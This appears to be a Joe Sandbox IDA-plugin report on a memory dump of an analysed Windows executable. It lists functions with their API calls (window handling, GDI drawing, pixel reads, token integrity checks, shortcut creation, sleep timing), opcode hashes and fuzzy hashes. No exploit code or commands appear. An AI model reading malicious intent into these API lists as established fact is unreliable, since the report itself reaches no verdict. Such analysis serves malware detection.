Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 928662f88007296978b9c488954ae30717009db1ebca1f6e9fde0af22cfbfb3f
Instruction ID: a1c3c4273a0e475271f48c69fce4a72d62fed76e31f2d34684f61408b3039dce
Opcode Fuzzy Hash: 928662f88007296978b9c488954ae30717009db1ebca1f6e9fde0af22cfbfb3f
Instruction Fuzzy Hash: F631C071500219EBEF14CFA8D94CBAE3BB5FF04315F10822AF925E62D1CBB49914DB91

Function 000CB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 000CB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000CB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000CB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000CB27F
_wcsstr.LIBCMT ref: 000CB289

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 71a9c2016f989c4e6dbee4f87019746169647ea0f5ef7444c09f00aefeba288b
Instruction ID: 84fef466f8bf9759719a6699c378c8d050be19e88d7719f514667600fc0c22c2
Opcode Fuzzy Hash: 71a9c2016f989c4e6dbee4f87019746169647ea0f5ef7444c09f00aefeba288b
Instruction Fuzzy Hash: 6E21B0326042017AEB259B799C4AFBF7B9CDF49760F00412DF805DA1A2EF659C41A6A0

Function 000FB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

GetWindowLongW.USER32(?,000000F0), ref: 000FB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 000FB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000FB1CF
GetSystemMetrics.USER32(00000004), ref: 000FB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,000E0E90,00000000), ref: 000FB216

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 6a595ed4ee7fffe96f4f836ac0a357197f77dfb106729f06acb0e604788dd961
Instruction ID: 377419f38f4ea33b4d6128ae7e6331880482a404f69ea6b3c13011fdba93b5ce
Opcode Fuzzy Hash: 6a595ed4ee7fffe96f4f836ac0a357197f77dfb106729f06acb0e604788dd961
Instruction Fuzzy Hash: 5421B171A1061AAFCB609F38CC04A7A3BA5FB05761F144728FA32D79E0D7309910EF80

Function 000C9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000C9320

Part of subcall function 00077BCC: _memmove.LIBCMT ref: 00077C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000C9352
__itow.LIBCMT ref: 000C936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000C9392
__itow.LIBCMT ref: 000C93A3

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 777f98c1cf8eabb5dd897017385ce8cc78e24cf3ef10c4430b5a4bf9a5f6aa94
Instruction ID: 6a2d1a7cca3b2bb24f1423e1d6833721ce197839d40e08be4edd498ade2132f0
Opcode Fuzzy Hash: 777f98c1cf8eabb5dd897017385ce8cc78e24cf3ef10c4430b5a4bf9a5f6aa94
Instruction Fuzzy Hash: DC21C531B00248ABDB119B648C89FFE7BA9EF49750F048029F949EB1D1DBB0CE51D7A5

Function 000E5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 000E5A6E
GetForegroundWindow.USER32 ref: 000E5A85
GetDC.USER32(00000000), ref: 000E5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 000E5ACD
ReleaseDC.USER32(00000000,00000003), ref: 000E5B08

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: ac32f5c8c8697bf586904b8c862e13d60b29b31fbea835e14ed6225a6a89ec3a
Instruction ID: e36b208b0bdbba2d6817fb2066c50bf20491cc4ea141ea26952b61f04a60d902
Opcode Fuzzy Hash: ac32f5c8c8697bf586904b8c862e13d60b29b31fbea835e14ed6225a6a89ec3a
Instruction Fuzzy Hash: 57215B35A00204AFDB14EF65DD88AAABBE5EF49311F14C479E819D7762CA34AD00DBA1

Function 000712F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0007134D
SelectObject.GDI32(?,00000000), ref: 0007135C
BeginPath.GDI32(?), ref: 00071373
SelectObject.GDI32(?,00000000), ref: 0007139C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: caca23720688ed8fd5d031f0438adc9819c50c1b2db84446a4f9efa36c0e56b0
Instruction ID: 82580deb86b425d1d41e789caa773a0f51782d74aac0f1178165d43eb492f966
Opcode Fuzzy Hash: caca23720688ed8fd5d031f0438adc9819c50c1b2db84446a4f9efa36c0e56b0
Instruction Fuzzy Hash: 21216030C00609EFDB108F2ADC04BAD7BE9FB00B21F148256F814969F1D7789991DFA4

Function 000CBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 000CBCB3
_memcmp.LIBCMT ref: 000CBCD1
_memcmp.LIBCMT ref: 000CBCE4
_memcmp.LIBCMT ref: 000CBCFC
_memcmp.LIBCMT ref: 000CBD14

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 6fe1da6cb8578042aa4e5e9b946f53b53c100d0b02e2943998dd622d404b2008
Instruction ID: ec512410a33140119a09f5a9a59cf91f7dfa401f343b3b84dbac4d392c337f38
Opcode Fuzzy Hash: 6fe1da6cb8578042aa4e5e9b946f53b53c100d0b02e2943998dd622d404b2008
Instruction Fuzzy Hash: 620180717401067BEA156B119D83FFFB75CDF15398F044029FD0596283FBA0DE1092A1

Function 000D4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000D4ABA
__beginthreadex.LIBCMT ref: 000D4AD8
MessageBoxW.USER32(?,?,?,?), ref: 000D4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000D4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000D4B0A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: c67b7fb42d35ec9e43d8efafe25f47c19c6fa3f497e54edcb650b2265a264c34
Instruction ID: ebb52ba809b91b602e979354bee2e31ea98bfdc464531b6ac70b2062ac3c08c1
Opcode Fuzzy Hash: c67b7fb42d35ec9e43d8efafe25f47c19c6fa3f497e54edcb650b2265a264c34
Instruction Fuzzy Hash: E4110476904709BBD7108FA8AC08AAB7FADEB45320F14426AF914D3790D775C9408BB0

Function 000C8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000C821E
GetLastError.KERNEL32(?,000C7CE2,?,?,?), ref: 000C8228
GetProcessHeap.KERNEL32(00000008,?,?,000C7CE2,?,?,?), ref: 000C8237
HeapAlloc.KERNEL32(00000000,?,000C7CE2,?,?,?), ref: 000C823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000C8255

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: c7ebdebab8d4c968eb20b6358008fd76720ad70f5c2c477646222b59c1fdd41e
Instruction ID: c50dec9e98fcd99636cd7b6755a155c1f78906af2d01f79649fd95bbc64cf6b8
Opcode Fuzzy Hash: c7ebdebab8d4c968eb20b6358008fd76720ad70f5c2c477646222b59c1fdd41e
Instruction Fuzzy Hash: 21016D71200205BFEB205FA5DC8CDBB7BACFF8A754B50442DF909C2220DA318C00DB60

Function 000C710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?,?,?,000C7455), ref: 000C7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?,?), ref: 000C7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?,?), ref: 000C7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?), ref: 000C7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,000C7044,80070057,?,?), ref: 000C716C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 7d4e32e426a7f2431dfaad2cd385fd07b7a2b825c127db683bbc1ed92a745654
Instruction ID: 1c106aaf205cde531311d8aee08f7315b4acb6d17b1d05b0aa813b877ef3fd70
Opcode Fuzzy Hash: 7d4e32e426a7f2431dfaad2cd385fd07b7a2b825c127db683bbc1ed92a745654
Instruction Fuzzy Hash: 99014872601205ABEB114F69DC44BBE7BA9EF44791F180068BD08D2220DB36DD41EAA0

Function 000D5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000D5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 000D526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 000D5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 000D5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000D52BC

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 6f95c12934e2e0bf37ed739deb2ece0fdbf625b6f5ced7ebdff191323df2af5e
Instruction ID: 7a2b6d56429ab207f34bb4fdad0670f3ea96b1eb989c2fdf77d34c8ccfc9b0a8
Opcode Fuzzy Hash: 6f95c12934e2e0bf37ed739deb2ece0fdbf625b6f5ced7ebdff191323df2af5e
Instruction Fuzzy Hash: 54010532D01A1ADBDF00AFE4EC499FEBB78BF0A712F400156E941B2245CB345558D7A1

Function 000C810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000C8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000C812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000C813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000C8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000C8157

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ad39b62ac0a848a67d0681d75fb3c68d2d749ef946f8423bbf8b0562e12547cd
Instruction ID: 73c72bbf271d6fa898470a1e17a510d671abc4eaa4f036a302cb557216fa1584
Opcode Fuzzy Hash: ad39b62ac0a848a67d0681d75fb3c68d2d749ef946f8423bbf8b0562e12547cd
Instruction Fuzzy Hash: C0F04971200305AFEB511FA5EC88F7B3BECFF89758B044029F989C6260DA659952EB60

Function 000CC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 000CC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 000CC20E
MessageBeep.USER32(00000000), ref: 000CC226
KillTimer.USER32(?,0000040A), ref: 000CC242
EndDialog.USER32(?,00000001), ref: 000CC25C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 63735f9f605190c9973abcbe2ea7dfaf7d2ad8ef65f4c5200027cece72de228e
Instruction ID: d4db847c0f2d49f2140ba1a4e51de7ef1a8d845f44eddd95de8e531116549206
Opcode Fuzzy Hash: 63735f9f605190c9973abcbe2ea7dfaf7d2ad8ef65f4c5200027cece72de228e
Instruction Fuzzy Hash: 4B018F30404305ABFB205B60ED4EFBA77A8BF00B06F00026DF546E18E19BA86944DA90

Function 000713B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 000713BF
StrokeAndFillPath.GDI32(?,?,000AB888,00000000,?), ref: 000713DB
SelectObject.GDI32(?,00000000), ref: 000713EE
DeleteObject.GDI32 ref: 00071401
StrokePath.GDI32(?), ref: 0007141C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 0fe7877e13ed4da428833eda93cd06985ab03ccfd48bc276c02ac7341d391956
Instruction ID: e5453be54a06e3d9cda7a29b2298a3cfe723582065bf0274024cbef887e9a8ac
Opcode Fuzzy Hash: 0fe7877e13ed4da428833eda93cd06985ab03ccfd48bc276c02ac7341d391956
Instruction Fuzzy Hash: 7CF0C930404A09EBEB115F6AEC4C7A83BE6AB01736F08C265E569498F1CB3949D5EF64

Function 00082CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00090DB6: std::exception::exception.LIBCMT ref: 00090DEC
Part of subcall function 00090DB6: __CxxThrowException@8.LIBCMT ref: 00090E01

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 00077A51: _memmove.LIBCMT ref: 00077AAB

__swprintf.LIBCMT ref: 00082ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00082D66

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 66393af379527c2b872584f994a941118a8b427c9cfbf28c9b5057a0c0d71706
Instruction ID: 58c8b1740fa171256fd891d1732e19a794b4a62a671de5ffbb2ccabd815ae077
Opcode Fuzzy Hash: 66393af379527c2b872584f994a941118a8b427c9cfbf28c9b5057a0c0d71706
Instruction Fuzzy Hash: 03914A715082019FCB14EF28C885CAEB7F8FF95710F00492DF5999B2A2DB65ED44CB56

Function 000DB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00074750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00074743,?,?,000737AE,?), ref: 00074770

CoInitialize.OLE32(00000000), ref: 000DB9BB
CoCreateInstance.OLE32(00102D6C,00000000,00000001,00102BDC,?), ref: 000DB9D4
CoUninitialize.OLE32 ref: 000DB9F1

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

Strings

.lnk, xrefs: 000DB99D, 000DB9AB

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 08c29c262aeab365cf90b88f57f177cfd00b0fe2b6bd71517c7d5abae922374b
Instruction ID: 3df9a08887c3b3bfc9d6bc67655a8960789176324946759c28b41a7dfd10160b
Opcode Fuzzy Hash: 08c29c262aeab365cf90b88f57f177cfd00b0fe2b6bd71517c7d5abae922374b
Instruction Fuzzy Hash: D5A14675A043019FC710DF14C884D6ABBE5FF89324F058999F8999B3A2CB31EC45CBA2

Function 0009501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 000950AD

Part of subcall function 000A00F0: __87except.LIBCMT ref: 000A012B

Strings

pow, xrefs: 00095085, 000950A2

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: ec8e811c8d301ac1b8bbce1895bd701e31b99728a3de0473c1db1fd4a566a6df
Instruction ID: e0c5524ec1a9d8a0cf583ddc85acaab58f68ecd1e5f3b6b7b797f3e94b5bf3f1
Opcode Fuzzy Hash: ec8e811c8d301ac1b8bbce1895bd701e31b99728a3de0473c1db1fd4a566a6df
Instruction Fuzzy Hash: 3A51B020D0C60686DF627755CD113BE3BD0AB82301F208D58F4D5862EAEF348DD8EB86

Function 00086192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00086248
